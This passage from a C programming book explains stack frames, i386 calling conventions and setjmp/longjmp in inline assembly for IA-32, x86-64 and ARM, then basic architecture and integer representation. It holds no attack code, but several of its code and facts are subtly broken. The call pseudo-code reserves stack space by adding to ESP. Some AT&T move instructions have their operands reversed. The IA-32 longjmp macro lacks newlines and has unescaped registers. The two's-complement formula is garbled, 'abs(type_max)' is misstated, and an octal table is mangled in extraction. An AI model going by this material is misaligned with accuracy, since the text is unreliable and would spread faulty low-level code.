aspects of C’s run model.
66 CHAPTER 9. C RUN MODEL
9.2 C Interface
9.2.1 Stack
9.2.1.1 Stack Pointer
Stack pointer is a [register] pointer to the current item on the stack. On i386-based
machine architecture, the stack pointer is stored in the ESP-register. When a value is
popped from the stack, it is first taken from the address in the stack pointer, and then the
stack pointer is incremented by 4 bytes; ESP points to the current location on the stack.
Pushing values works by decrementing the stack pointer to point to the next location,
then storing the value at the address pointed to by the stack pointer. I’ll clarify this by
describing the operations in C-like code
#define pop() (*(sp++))
#define push(val) (*(--sp) = (val))
9.2.2 Frame Pointer
Frame pointer points to the stack frame of the current function. This is where the frame
pointer value for the caller, the return address for the proper instruction in it, and the
arguments the current function was called with are located. On i386, the frame pointer
is stored in the EBP-register. Many compilers provide an optimisation to omit using
the frame pointer; beware that this optimisation can break code that explicitly relies on
the frame pointer.
9.2.3 Program Counter aka Instruction Pointer
Program Counter is a traditional term for instruction pointer [register]. This is the
address register used to find the next instruction in memory. On i386, this pointer is
stored in the EIP- register (and cannot be manipulated without a bit of trickery). At
machine level, when exceptions/interrupts such as zero-division occur, EIP may point
to the instruction that caused the exception or the instruction right after it in memory
(to allow the program to be restarted after handling the interrupt.
9.2.4 Automatic Variables
Variables within function bodies are called automatic because the compiler takes care
of their allocation on the stack.
It is noteworthy that unless you initialise (set) these variables to given values, they con-
tain whatever is in that location in [stack] memory and so unlogical program behavior
may happen if you use automatic variables without initialising them first. Luckily,
compilers can be configured to warn you about use of uninitialised variables if they
don’t do it by default.
9.2. C INTERFACE 67
9.2.5 Stack Frame
On the i386, a stack frame looks like (I show the location of function parameters for
completeness’ sake).
/* IA32. */
struct frame {
/* internal variables */
int32_t ebp; /* 'top' */
int32_t eip; /* return address */
/*
* function call arguments in
* reverse order
*/
};
Note that in structures, the lower-address members come first; the instruction pointer
is stored before (push) and so above the previous frame pointer.
9.2.6 Function Calls
A function call in typical C implementations consists roughly of the following parts. If
you need details, please study your particular implementation.
push function arguments to stack in reverse order (right to left) of declaration.
store the instruction pointer value for the next instruction to stack.
push the current value of the frame pointer to stack.
set frame pointer to value of stack pointer
adjust stack pointer to reserve space for automatic variables on stack.
In pseudo-code:
push(arg3)
push(arg2)
push(arg1)
push(EIP) // return address
push(EBP) // callee frame
mov(ESP, EBP) // set frame pointer
add(sizeof(autovars), ESP) // adjust stack
A hypothetical call
foo(1, 2, 3);
would then leave the bottom of the stack look something like this:
68 CHAPTER 9. C RUN MODEL
Value Explanation Notes
3 argument #3
2 argument #2
1 argument #1
eip return address to caller next instruction after return
ebp frame pointer for caller EBP points here
val1 first automatic variable on stack
val2
val3 ESP points here
It’s noteworthy than unless you explicitly initialise them, the values on stack (v1, v2,
and v3) contain ’garbage’, i.e. any data that has or has not been written to memory
addresses after system bootstrap.
9.2.6.1 Function Arguments
TODO: distinction between function arguments and parameters
Stack or Registers
Function arguments can be variables either on the stack or in registers.
As an example, let’s take a quick look at how FreeBSD implements system calls.
The first possibility is to push the function arguments [in reverse order] to the call stack.
Then one would load the EAX-register with the system call number, and finally trigger
INT 80H to make the kernel do its magic.
Alternatively, in addition to EAX being loaded with the system call number, arguments
can be passed in EBX, ECX, EDX, ESI, EDI, and EBP.
9.2.6.2 Return Value
EAX:EDX
The traditional i386 register for return values is EAX; 64-bit return values can be im-
plementing by loading EDX with the high 32 bits of the value. FreeBSD is said to
store the return value for SYS_fork in EDX; perhaps this is to facilitate the special
’two return-values’ nature of fork() without interfering with other use of registers in C
libraries and so on.
C-language error indicator, errno , can be implemented by returning the proper number
in EAX and using other kinds of error indications to tell the C library that an error
occurred. The FreeBSD convention is to set the carry flag (the CF-bit in EFLAGS).
Linux returns signed values in EAX to indicate errors.
32-bit words are getting small today. Notably, this shows as several versions of seek();
these days, disks and files are large and you may need weird schemes to deal with
offsets of more than 31 or 32 bits. Therefore, off_t is 64-bit signed to allow bigger file
offsets and sizes. Linux llseek() passes the seek offset (off_t) in two registers on 32-bit
systems.
9.2. C INTERFACE 69
9.2.6.3 i386 Function Calls
i386 Details
Let’s take a look at how C function calls are implemented on the i386.
To make your function accessible from assembly code, tell GCC to give it ’external
linkage’ by using stack (not registers) to pass arguments.
#include <stdio.h>
#include <stdlib.h>
#define ALINK __attribute__ ((regparm(0)))
ALINK
void
hello(char *who, char *prog, int num1, int num2)
{
int32_t res;
res = num1 + num2;
printf("hello %s\n", who);
printf("%s here\n", prog);
printf("%d + %d is equal to %d\n",\
num1, num2, res);
return;
}
int
main(int argc, char *argv[])
{
hello(argv[1], argv[0], 1, 2);
exit(0);
}
This program takes a single command-line argument, your name, and uses the conven-
tion that the first argument ( argv[0] is name of executable (including the supplied path)
and the second argument argv[1] is the first command line argument (the rest would
follow if used, but they are ignored as useless).
When hello() is called, before entry to it, GCC arranges equivalent of
push num2
push num1
push argv[0]
push argv[1]
Note that the arguments are pushed in ’reverse order’. It makes sense thinking of the
fact that now you can pop them in ’right’ order.
70 CHAPTER 9. C RUN MODEL
At this stage, the address of the machine instruction right before the system call is
stored; in pseudo-code,
pushl %retadr
Next, the compiler arranges a stack frame.
pushl %ebp # frame pointer
movl %ebp, %esp # new stack frame
Note that EBP stores the frame pointer needed to return from the function so it’s gen-
erally not a good idea to use EBP in your code.
Now it is time to allocate automatic variables, i.e. variables internal to a function
that are not declared static. The compiler may have done the stack adjustment in the
previous listing and this allocation with the ENTER machine instruction, but if not so,
it adds a constant to the stack pointer here, for example
addl $0x08, %esp # 2 automatic variables
Note that the stacks operates in 32-bit mode, so for two automatic (stack) variables, the
adjustment becomes 8.
This may be somewhat hairy to grasp, so I will illustrated it C-style.
You can think of the frame as looking like this at this point.
/*
* EBP points to oldfp.
* ESP is &avar[-2].
*/
struct cframe {
int32_t avar[0]; // empty; not allocated
int32_t oldfp; // frame of caller
int32_t retadr; // return address
int32_t args[0]; // empty
}
Empty Tables
Note the empty tables (size 0), which C99 actually forbids. These are used as place
holders (don’t use up any room in the struct); they are useful to pass stack addresses in
this case.
Illustration
Finally, I will show you how the stack looks like in plain English. Note that in this
illustration, memory addresses grow upwards.
Stack Value Explanation
num2 0x00000002 value 2
num1 0x00000001 value 1
argv[1] pointer second argument
argv[0] pointer first argument
retadr return address address of next instruction after return
oldfp caller frame EBP points here
res undefined automatic variable
9.3. NONLOCAL GOTO; SETJMP() AND LONGJMP() 71
Return Address
If you should need the return address in your code, you can read it from the stack at
address EBP + 4. In C and a bit of (this time, truly necessary) assembly, this could be
done like this.
struct _stkframe {
int32_t oldfp; // frame of caller
int32_t retadr; // return address
};
void
dummy(void)
{
struct _stkframe *frm;
__asm__ ("movl %%ebp, %0" : "=rm" (frm));
fprintf(stderr, "retadr is %x\n", frm->retadr);
return;
}
Note that on return from functions the compiler arranges, in addition to the other magic,
something like this.
popl %ebp
movl %ebp, %esp
ret
Callee-Save Registers
By convention, the following registers are ’callee-save’, i.e. saved before entry to
functions (so you don’t need to restore their values by hand).
Registers
EBX
EDI
ESI
EBP
DS
ES
SS
9.3 Nonlocal Goto; setjmp() and longjmp()
In C, <setjmp.h> defines the far-jump interface. You declare a buffer of the type
jmp_buf
jmp_buf jbuf;
This buffer is initialised to state information needed for returning to the current location
in code (the instruction right after the call to setjmp()) like this:
72 CHAPTER 9. C RUN MODEL
if (!setjmp(jbuf)) {
dostuff();
}
/* continue here after longjmp() */
Then, to jump back to call dostuff(), you would just
longjmp(jbuf, val);
9.3.1 Interface
9.3.1.1 <setjmp.h>
Here’s our C library header file <setjmp.h>
#ifndef __SETJMP_H__
#define __SETJMP_H__
#if defined(__x86_64__) || defined(__amd64__)
#include <x86-64/setjmp.h>
#elif defined(__arm__)
#include <arm/setjmp.h>
#elif defined(__i386__)
#include <ia32/setjmp.h>
#endif
typedef struct _jmpbuf jmp_buf[1];
/* ISO C prototypes. */
int setjmp(jmp_buf env);
void longjmp(jmp_buf env, int val);
/* Unix prototypes. */
int _setjmp(jmp_buf env);
void _longjmp(jmp_buf env, int val);
#endif /* __SETJMP_H__ */
9.3.2 Implementation
Note that you need to disable some optimisations in order for setjmp() and longjmp()
to build and operate correctly. With the GNU C Compiler, this is achieved by using the
-fno-omit-frame-pointer compiler flag.
9.3. NONLOCAL GOTO; SETJMP() AND LONGJMP() 73
9.3.2.1 IA-32 implementation
Following is an implementation of the setjmp() and longjmp() interface functions for
the IA-32 architecture. Note that the behavior of non-volatile automatic variables
within the caller function of setjmp() may be somewhat hazy and undefined.
ia32/setjmp.h
#ifndef __IA32_SETJMP_H__
#define __IA32_SETJMP_H__
#include <stddef.h>
#include <stdint.h>
#include <signal.h>
#include <zero/cdecl.h>
struct _jmpbuf {
int32_t ebx;
int32_t esi;
int32_t edi;
int32_t ebp;
int32_t esp;
int32_t eip;
#if (_POSIX_SOURCE)
sigset_t sigmask;
#elif (_BSD_SOURCE)
int sigmask;
#endif
} PACK();
struct _jmpframe {
int32_t ebp;
int32_t eip;
uint8_t args[EMPTY];
} PACK();
/*
* callee-save registers: ebx, edi, esi, ebp, ds, es, ss.
*/
#define __setjmp(env) \
__asm__ __volatile__ ("movl %0, %%eax\n" \
"movl %%ebx, %c1(%%eax)\n" \
"movl %%esi, %c2(%%eax)\n" \
"movl %%edi, %c3(%%eax)\n" \
"movl %c4(%%ebp), %%edx\n" \
"movl %%edx, %c5(%%eax)\n" \
"movl %c6(%%ebp), %%ecx\n" \
"movl %%ecx, %c7(%%eax)\n" \
74 CHAPTER 9. C RUN MODEL
"leal %c8(%%ebp), %%edx\n" \
"movl %%edx, %c9(%%eax)\n" \
: \
: "m" (env), \
"i" (offsetof(struct _jmpbuf, ebx)), \
"i" (offsetof(struct _jmpbuf, esi)), \
"i" (offsetof(struct _jmpbuf, edi)), \
"i" (offsetof(struct _jmpframe, ebp)), \
"i" (offsetof(struct _jmpbuf, ebp)), \
"i" (offsetof(struct _jmpframe, eip)), \
"i" (offsetof(struct _jmpbuf, eip)), \
"i" (offsetof(struct _jmpframe, args)), \
"i" (offsetof(struct _jmpbuf, esp)) \
: "eax", "ecx", "edx")
#define __longjmp(env, val) \
__asm__ __volatile__ ("movl %0, %%ecx\n" \
"movl %1, %%eax\n" \
"cmp $0, %eax\n" \
"jne 0f\n" \
"movl $1, %eax\n" \
"0:\n" \
"movl %c2(%%ecx), %%ebx" \
"movl %c3(%%ecx), %%esi" \
"movl %c4(%%ecx), %%edi" \
"movl %c5(%%ecx), %%ebp" \
"movl %c6(%%ecx), %%esp" \
"movl %c7(%%ecx), %%edx" \
"jmpl *%edx\n" \
: \
: "m" (env), \
"m" (val), \
"i" (offsetof(struct _jmpbuf, ebx)), \
"i" (offsetof(struct _jmpbuf, esi)), \
"i" (offsetof(struct _jmpbuf, edi)), \
"i" (offsetof(struct _jmpbuf, ebp)), \
"i" (offsetof(struct _jmpbuf, esp)), \
"i" (offsetof(struct _jmpbuf, eip)) \
: "eax", "ebx", "ecx", "edx", \
"esi", "edi", "ebp", "esp")
#endif /* __IA32_SETJMP_H__ */
9.3.2.2 X86-64 Implementation
x86-64/setjmp.h
9.3. NONLOCAL GOTO; SETJMP() AND LONGJMP() 75
/*
* THANKS
* ------
* - Henry 'froggey' Harrington for amd64-fixes
* - Jester01 and fizzie from ##c on Freenode
*/
#ifndef __X86_64_SETJMP_H__
#define __X86_64_SETJMP_H__
#include <stddef.h>
#include <stdint.h>
//#include <signal.h>
#include <zero/cdecl.h>
//#include <mach/abi.h>
struct _jmpbuf {
int64_t rbx;
int64_t r12;
int64_t r13;
int64_t r14;
int64_t r15;
int64_t rbp;
int64_t rsp;
int64_t rip;
#if (_POSIX_SOURCE)
// sigset_t sigmask;
#elif (_BSD_SOURCE)
// int sigmask;
#endif
} PACK();
struct _jmpframe {
int64_t rbp;
int64_t rip;
uint8_t args[EMPTY];
} PACK();
/*
* callee-save registers: rbp, rbx, r12...r15
*/
#define __setjmp(env) \
__asm__ __volatile__ ("movq %0, %%rax\n" \
"movq %%rbx, %c1(%%rax)\n" \
"movq %%r12, %c2(%%rax)\n" \
"movq %%r13, %c3(%%rax)\n" \
"movq %%r14, %c4(%%rax)\n" \
76 CHAPTER 9. C RUN MODEL
"movq %%r15, %c5(%%rax)\n" \
"movq %c6(%%rbp), %%rdx\n" \
"movq %%rdx, %c7(%%rax)\n" \
"movq %c8(%%rbp), %%rcx\n" \
"movq %%rcx, %c9(%%rax)\n" \
"leaq %c10(%%rbp), %%rdx\n" \
"movq %%rdx, %c11(%%rax)\n" \
: \
: "m" (env), \
"i" (offsetof(struct _jmpbuf, rbx)), \
"i" (offsetof(struct _jmpbuf, r12)), \
"i" (offsetof(struct _jmpbuf, r13)), \
"i" (offsetof(struct _jmpbuf, r14)), \
"i" (offsetof(struct _jmpbuf, r15)), \
"i" (offsetof(struct _jmpframe, rbp)), \
"i" (offsetof(struct _jmpbuf, rbp)), \
"i" (offsetof(struct _jmpframe, rip)), \
"i" (offsetof(struct _jmpbuf, rip)), \
"i" (offsetof(struct _jmpframe, args)), \
"i" (offsetof(struct _jmpbuf, rsp)) \
: "rax", "rcx", "rdx")
#define __longjmp(env, val) \
__asm__ __volatile__ ("movq %0, %%rcx\n" \
"movq %1, %%rax\n" \
"movq %c2(%%rcx), %%rbx\n" \
"movq %c3(%%rcx), %%r12\n" \
"movq %c4(%%rcx), %%r13\n" \
"movq %c5(%%rcx), %%r14\n" \
"movq %c6(%%rcx), %%r15\n" \
"movq %c7(%%rcx), %%rbp\n" \
"movq %c8(%%rcx), %%rsp\n" \
"movq %c9(%%rcx), %%rdx\n" \
"jmpq *%%rdx\n" \
: \
: "m" (env), \
"m" (val), \
"i" (offsetof(struct _jmpbuf, rbx)), \
"i" (offsetof(struct _jmpbuf, r12)), \
"i" (offsetof(struct _jmpbuf, r13)), \
"i" (offsetof(struct _jmpbuf, r14)), \
"i" (offsetof(struct _jmpbuf, r15)), \
"i" (offsetof(struct _jmpbuf, rbp)), \
"i" (offsetof(struct _jmpbuf, rsp)), \
"i" (offsetof(struct _jmpbuf, rip)) \
: "rax", "rbx", "rcx", "rdx", \
"r12", "r13", "r14", "r15", \
"rsp")
#endif /* __X86_64_SETJMP_H__ */
9.3. NONLOCAL GOTO; SETJMP() AND LONGJMP() 77
9.3.2.3 ARM Implementation
arm/setjmp.h
#ifndef __ARM_SETJMP_H__
#define __ARM_SETJMP_H__
#include <stddef.h>
#include <stdint.h>
#include <signal.h>
#include <zero/cdecl.h>
#if 0 /* ARMv6-M */
/* THANKS to Kazu Hirata for putting this code online :) */
struct _jmpbuf {
int32_t r4;
int32_t r5;
int32_t r6;
int32_t r7;
int32_t r8;
int32_t r9;
int32_t r10;
int32_t fp;
int32_t sp;
int32_t lr;
#if (_POSIX_SOURCE)
sigset_t sigmask;
#elif (_BSD_SOURCE)
int sigmask;
#endif
} PACK();
#define __setjmp(env) \
__asm__ __volatile__ ("mov r0, %0\n" : : "r" (env)); \
__asm__ __volatile__ ("stmia r0!, { r4 - r7 }\n"); \
__asm__ __volatile__ ("mov r1, r8\n"); \
__asm__ __volatile__ ("mov r2, r9\n"); \
__asm__ __volatile__ ("mov r3, r10\n"); \
__asm__ __volatile__ ("mov r4, fp\n"); \
__asm__ __volatile__ ("mov r5, sp\n"); \
__asm__ __volatile__ ("mov r6, lr\n"); \
__asm__ __volatile__ ("stmia r0!, { r1 - r6 }\n"); \
__asm__ __volatile__ ("sub r0, r0, #40\n"); \
__asm__ __volatile__ ("ldmia r0!, { r4, r5, r6, r7 }\n"); \
78 CHAPTER 9. C RUN MODEL
__asm__ __volatile__ ("mov r0, #0\n"); \
__asm__ __volatile__ ("bx lr\n")
#define __longjmp(env, val) \
__asm__ __volatile__ ("mov r0, %0\n" : : "r" (env)); \
__asm__ __volatile__ ("mov r1, %0\n" : : "r" (val)); \
__asm__ __volatile__ ("add r0, r0, #16\n"); \
__asm__ __volatile__ ("ldmia r0!, { r2 - r6 }\n"); \
__asm__ __volatile__ ("mov r8, r2\n"); \
__asm__ __volatile__ ("mov r9, r3\n"); \
__asm__ __volatile__ ("mov r10, r4\n"); \
__asm__ __volatile__ ("mov fp, r5\n"); \
__asm__ __volatile__ ("mov sp, r6\n"); \
__asm__ __volatile__ ("ldmia r0!, { r3 }\n"); \
__asm__ __volatile__ ("sub r0, r0, #40\n"); \
__asm__ __volatile__ ("ldmia r0!, { r4 - r7 }\n"); \
__asm__ __volatile__ ("mov r0, r1\n"); \
__asm__ __volatile__ ("moveq r0, #1\n"); \
__asm__ __volatile__ ("bx r3\n")
#endif /* 0 */
struct _jmpbuf {
int32_t r4;
int32_t r5;
int32_t r6;
int32_t r7;
int32_t r8;
int32_t r9;
int32_t r10;
int32_t fp;
int32_t sp;
int32_t lr;
sigset_t sigmask;
} PACK();
#define __setjmp(env) \
__asm__ __volatile__ ("movs r0, %0\n" \
"stmia r0!, { r4-r10, fp, sp, lr }\n" \
"movs r0, #0\n" \
: \
: "r" (env))
#define __longjmp(env, val) \
__asm__ __volatile__ ("movs r0, %0\n" \
"movs r1, %1\n" \
"ldmia r0!, { r4-r10, fp, sp, lr }\n" \
"movs r0, r1\n" \
"moveq r0, #1\n" \
"bx lr\n" \
9.3. NONLOCAL GOTO; SETJMP() AND LONGJMP() 79
: \
: "r" (env), "r" (val))
#endif /* __ARM_SETJMP_H__ */
9.3.3 setjmp.c
#include <signal.h>
#include <setjmp.h>
#include <zero/cdecl.h>
#if defined(ASMLINK)
ASMLINK
#endif
int
setjmp(jmp_buf env)
{
__setjmp(env);
_savesigmask(&env->sigmask);
return 0;
}
#if defined(ASMLINK)
ASMLINK
#endif
void
longjmp(jmp_buf env,
int val)
{
_loadsigmask(&env->sigmask);
__longjmp(env, val);
/* NOTREACHED */
}
#if defined(ASMLINK)
ASMLINK
#endif
int
_setjmp(jmp_buf env)
{
__setjmp(env);
return 0;
}
80 CHAPTER 9. C RUN MODEL
#if defined(ASMLINK)
ASMLINK
#endif
void
_longjmp(jmp_buf env,
int val)
{
__longjmp(env, val);
/* NOTREACHED */
}
Part V
Computer Basics
81

83
It is time to take a quick look at basic computer architecture.
84
Chapter 10
Basic Architecture
10.1 Control Bus
For our purposes, we can think of control bus as two signals; RESET and CLOCK.
RESET is used to trigger system initialisation to a known state to start running
the operating system.
CLOCK is a synchronisation signal that keeps the CPU and its external [memory
and I/O] devices in synchronisation.
10.2 Memory Bus
Address Bus
Basically, address bus is where addresses for memory and I/O access are delivered. To
simplify things, you might push a memory address on the address bus, perhaps modify
it with an index register, and then fetch a value from or store a value to memory.
Data Bus
Data bus works in concert with the address bus; this is where actual data is delivered
between the CPU and memory as well as I/O devices.
10.3 Von Neumann Machine
Essentially, von Neumann machines consist of CPU ,memory , and I/O(input and
output) facilities. Other similar architecture names such as Harvard exist for versions
with extended memory subsystems, mostly, but as that is beyond our scope, I chose the
’original’ name.
85
86 CHAPTER 10. BASIC ARCHITECTURE
10.3.1 CPU
A CPU, central processing unit, is the heart of a computer. Without mystifying and
obscuring things too much, let’s think about it as a somewhat complex programmable
calculator.
For a CPU, the fastest storage form is a register. A typical register set has dedicated
registers for integer and floating point numbers; to make life easier, these are just bit-
patterns representing values (integer) or approximations of values (floating-point) in
some specified formats.
A notable quite-recent trend in CPUs are multicore chips; these have more than one
execution unit inside them in order to execute several threads in parallel.
10.3.2 Memory
Memory is a non-persistent facility to store code and data used by the CPU. Whereas
the register set tends to be fixed for a given CPU, memory can usually be added to
computer systems. From a programmer’s point of view, memory is still several times
slower than registers; this problem is dealt with [fast] cache memory; most commonly,
level 1 (L1) cache is on-chip and L2 cache external to the CPU.
As a rule of thumb, fast code should avoid unnecessary memory access and organize
it so that most fetches would be served from cache memory. In general, let’s, for now,
say that you should learn to think about things in terms of words, cachelines, and pages
- more on this fundamental topic later on.
10.3.3 I/O
I/O, input and output, is used for storing and retrieving external data. I/O devices tend
to be orders of magnitude slower than memory; a notable feature, though, is that they
can be persistent. For example, data written on a disk will survive electric outages
instead of being wiped like most common types of memory would.
In addition to disks, networks have become a more-and-more visible form of I/O. In
fact, whereas disks used to be faster than [most] networks, high-speed networks are
fighting hard for the speed king status.
10.4 Conclusions
Simplified a bit, as a programmer it’s often safe to think about storage like this; fastest
first:
registers
memory
disks
network
10.4. CONCLUSIONS 87
removable media
Note, though, that high-speed networks may be faster than your disks.
88 CHAPTER 10. BASIC ARCHITECTURE
Part VI
Numeric Values
89

91
In this part, we take a look at computer presentation of numeric values. Deep within,
computer programming is about moving numeric values between memory, registers,
and I/O devices, as well as doing mathematical operations on them.
92
Chapter 11
Machine Dependencies
11.1 Word Size
Before the advent of C99 explicit-size types such as int8_t anduint8_t , programmers
had to ’rely on’ sizes of certain C types. I will list [most of] the assumptions made here,
not only as a historic relic, but also to aid people dealing with older code with figuring
it out.
Note that the sizes are listed in bytes.
Type Typical Size Notes
char 8-bit may be signed; unsigned char for 8-bit clean code
short 16-bit
int 32-bit ’fast integer’; typically 32-bit
long 32- or 64-bit typically machine word
long long 64 standardised in ISO C99
float 32 single-precision floating point
double 64 double precision floating point
long double 80 or 128 extended precision floating point
One could try to check for these types with either GNU Autoconf (theconfigure scripts
present in most open source projects these days use this strategy) or perhaps with some-
thing like
#include <limits.h>
#if (CHAR_MAX == 0x7f)
#define CHAR_SIGNED
#define CHAR_SIZE 1
#elif (CHAR_MAX == 0xff)
#define CHAR_UNSIGNED
#define CHAR_SIZE 1
#endif
#if (SHRT_MAX == 0x7fff)
93
94 CHAPTER 11. MACHINE DEPENDENCIES
#define SHORT_SIZE 2
#endif
#if (INT_MAX == 0x7fffffff)
#define INT_SIZE 4
#endif
#if (LONG_MAX == 0x7fffffff)
#define LONG_SIZE 4
#elif (LONG_MAX == 0x7fffffffffffffffULL)
#define LONG_SIZE 8
#endif
Notes
This code snippets is just an example, not totally portable.
Note that in this listing, sizes are defined in octets (i.e., 8-bit bytes). It’s also noteworthy
thatsizeof cannot be used with preprocessor directives such as #if; therefore, when
you have to deal with type sizes, you need to use some other scheme to check for and
declare them.
11.2 Byte Order
Most of the time, when working on the local platform, the programmer does not need
to care about byte order; the concern kicks in when you start communicating with other
computers using storage and network devices.
Byte order is machine-dependent; so-called little endian machines have the lowest byte
at the lowest memory address, and big endian machines vice versa. For example, the
i386 is little endian (lowest byte first), and PowerPC CPUs are big endian.
Typical UNIX-like systems have <endian.h> or<sys/endian.h> to indicate their byte
order. Here’s an example of how one might use it; I define a structure to extract the
8-bit components from a 32-bit ARGB-format pixel value.
#include <stdio.h>
#include <stdint.h>
#include <endian.h> /* <sys/endian.h> on some systems (BSD) */
#if (_BYTE_ORDER == _LITTLE_ENDIAN)
struct _argb {
uint8_t b;
uint8_t g;
uint8_t r;
uint8_t a;
};
#elif (_BYTE_ORDER == _BIG_ENDIAN)
struct _argb {
uint8_t a;
uint8_t r;
11.2. BYTE ORDER 95
uint8_t g;
uint8_t b;
};
#endif
#define aval(u32p) (((struct _argb *)(u32p))->a)
#define rval(u32p) (((struct _argb *)(u32p))->r)
#define gval(u32p) (((struct _argb *)(u32p))->g)
#define bval(u32p) (((struct _argb *)(u32p))->b)
96 CHAPTER 11. MACHINE DEPENDENCIES
Chapter 12
Unsigned Values
With the concepts of word size and byte order visited briefly, let’s dive into how com-
puters represent numerical values internally. Let us make our lives a little easier by
stating that voltages, logic gates, and so on are beyond the scope of this book and just
rely on the bits 0 and 1 to be magically present.
12.1 Binary Presentation
Unsigned numbers are presented as binary values. Each bit corresponds to the power
of two its position indicates, for example
01010101
is, from right to left,
\(1 * 2^0 + 0 * 2^1 + 1 * 2^2 + 0 * 2^3 + 1 * 2^4 + 0 * 2^5 + 1 * 2^6 + 0 * 2^7\)
which, in decimal, is
\(1 + 0 + 4 + 0 + 16 + 0 + 64 + 0 == 85\).
Note that C doesn’t allow one to specify constants in binary form directly; if you really
want to present the number above in binary, you can do something like
#define BINVAL ((1 << 6) | (1 << 4) | (1 << 2) | (1 << 0))
As was pointed to me, the GNU C Compiler (GCC) supports, as an extension to the C
language, writing binary constants like
uint32_t val = 0b01010101; /* binary value 01010101. */
12.2 Decimal Presentation
Decimal presentation of numeric values is what we human beings are used to. In C,
decimal values are presented just like we do everywhere else, i.e.
97
98 CHAPTER 12. UNSIGNED VALUES
int x = 165; /* assign decimal 165. */
12.3 Hexadecimal Presentation
Hexadecimal presentation is based on powers of 16, with the digits 0..9 representing,
naturally, values 0 through 9, and the letters a..f representing values 10 through 15.
For example, the [8-bit] unsigned hexadecimal value
0xff
corresponds, left to right, to the decimal value
\(15 * 16^1 + 15 * 16^0 == 240 + 15 == 255\).
A useful thing to notice about hexadecimal values is that each digit represents 4 bits. As
machine types tend to be multiples of 4 bytes in size, it’s often convenient to represent
their numeric values in hexadecimal. For example, whereas
4294967295
doesn’t reveal it intuitively, it’s easy to see from its hexadecimal presentation that
0xffffffff
is the maximum [unsigned] value a 32-bit type can hold, i.e. all 1-bits.
A useful technique is to represent flag-bits in hexadecimal, so like
#define BIT0 0x00000001
#define BIT1 0x00000002
#define BIT2 0x00000004
#define BIT3 0x00000008
#define BIT4 0x00000010
#define BIT5 0x00000020
/* BIT6..BIT30 not shown */
#define BIT31 0x80000000
where a good thing is that you can see the [required] size of the flag-type easier than
with
#define BIT0 (1U << 0)
#define BIT1 (1U << 1)
/* BIT2..BIT30 not shown */
#define BIT31 (1U << 31)
Hexadecimal Character Constants
Hexadecimal notation can be used to represent character constants by prefixing them
with
xwithin single quotes, e.g. ’\xff’
12.4. OCTAL PRESENTATION 99
12.4 Octal Presentation
Octal presentation is based on powers of 8. Each digit corresponds to 3 bits to represent
values 0..7. Constant values are prefixed with a ’0’ (zero), e.g.
01234 /* octal 1234 */
Octal Character Constants
One typical use of octal values is to represent numerical values of 7- or 8-bit characters,
of which some have special syntax. In C, octal integer character constants are enclosed
within a pair of single quotes “”’ and prefixed with a backslash “\”.
A char can consist of up to three octal digits; for example ’\1’, ’\01’, and ’\001’ would
be equal.
For some examples in ASCII:
Char Octal C Notes
NUL 000’ 0’ string terminator
BEL 007’ a’ bell
BS 010’ b’ backspace
SPACE 040’ ’ ’ space/empty
A 101 ’A’ upper case letter A
B 102 ’B’ upper case letter B
a 141 ’a’ lower case letter a
b 142 ’b’ lower case letter b
\ 134 ’\\’ escaped with another backslash
12.5 A Bit on Characters
A noteworthy difference between DOS-, Mac- and UNIX-text files in ASCII is that
whereas UNIX terminates lines with a linefeed ’\n’, DOS uses a carriage return +
linefeed pair "\r\n", and Mac (in non-CLI mode) uses ’\r’. Mac in CLI-mode uses ’\n’
just like UNIX.
Implementations of C supporting character sets other than the standard 7-/8-bit let you
use a special notation for characters that cannot be represented in the char-type:
L'x' /* 'x' as a wide character (wchar_t) */
12.6 Zero Extension
Zero extension just means filling high bits with 0 (zero). For example, to convert a
32-bit unsigned integral value to 64 bits, you would just fill the high 32 bits 32..63 with
zeroes, and the low 32 bits with the original value.
100 CHAPTER 12. UNSIGNED VALUES
12.7 Limits
The minimum 32-bit unsigned number in C is, naturally,
#define UINT32_MIN 0x00000000U /* all zero-bits. */
The maximum for 32-bit unsigned number is
#define UINT32_MAX 0xffffffffU /* all 1-bits */
12.8 Pitfalls
12.8.1 Underflow
Note that with unsigned types, subtractions with negative results lead to big values. For
example, with 32-bit unsigned types,
uint32_t u32 = 0;
--u32; /* u32 becomes 0xffffffff == UINT32_MAX! */
Therefore, if u32 can be zero, never do something like this:
while (--u32) {
/* do stuff. */
}
Instead, do
if (u32) {
while (--u32) {
/* do stuff. */
}
}
or
do {
/* do stuff. */
} while (u32-- > 0);
12.8.2 Overflow
With unsigned types, additions with results bigger than maximum value lead to small
values. For example, with 32-bit unsigned types,
uint32_t u32 = 0xffffffff; /* maximum value */
++u32; /* u32 becomes 0! */
One hazard here is constructs such as
12.8. PITFALLS 101
uint16_t u16;
for (u16 = 0 ; u16 <= UINT16_MAX ; u16++) {
/* do stuff. */
}
because adding to the maximum value causes an overflow and wraps the value to zero,
the loop would never terminate.
102 CHAPTER 12. UNSIGNED VALUES
Chapter 13
Signed Values
By introducing the sign [highest] bit, we can represent negative values to make life
more interesting.
13.1 Positive Values
Positive values 0..M, where M is the maximum value of a signed type, are represented
just like in unsigned presentation.
13.2 Negative Values
Let us see what is going on with negative [signed] values.
13.2.1 2’s Complement
This section discusses the dominant 2’s complement presentation of negative signed
integral values.
For signed types, negative values are represented with the highest bit (the sign-bit) set
to 1.
The rest of the bits in a negative signed value are defined so that the signed n-bit nu-
meric value i is presented as
\(2^n - 1\)
Note that 0 (zero) is presented as an unsigned value (sign-bit zero).
As an example, 32-bit -1, -2, and -3 would be represented like this:
#define MINUS_ONE 0xffffffff
#define MINUS_TWO 0xfffffffe
#define MINUS_THREE 0xfffffffd
103
104 CHAPTER 13. SIGNED VALUES
To negate a 2’s complement value, you can use this algorithm:
invert all bits
add one, ignoring any overflow
13.2.2 Limits
The minimum 32-bit signed number is
#define INT32_MIN (-0x7fffffff - 1)
whereas the maximum 32-bit signed number is
#define INT32_MAX 0x7fffffff
13.2.3 Sign Extension
Sign extension means filling high bits with the sign-bit. For example, a 32-bit signed
value would be converted to a 64-bit one by filling the high 32 bits 32..63 with the
sign-bit of the 32-bit value, and the low 32 bits with the original value.
13.2.4 Pitfalls
Note that you can’t negate the smallest negative value. Therefore, the result of abs(type_max),
i.e. absolute value, is undefined.
13.2.4.1 Underflow
On 2’s complement systems, the values of subtractions with results smaller than the
type-minimum are undefined.
13.2.4.2 Overflow
On 2’s complement systems, the values of additions with results greater than the type-
maximum are undefined.
Chapter 14
Floating Point Numeric
Presentation
TODO: comparison
http://docs.sun.com/source/806-3568/ncg_goldberg.html
http://randomascii.wordpress.com/2012/09/09/game-developer-magazine-floating-point
This chapter explains the IEEE 754 Standard for floating point values.
14.1 Basics
Floating-point numbers consist of two parts; significand andexponent .
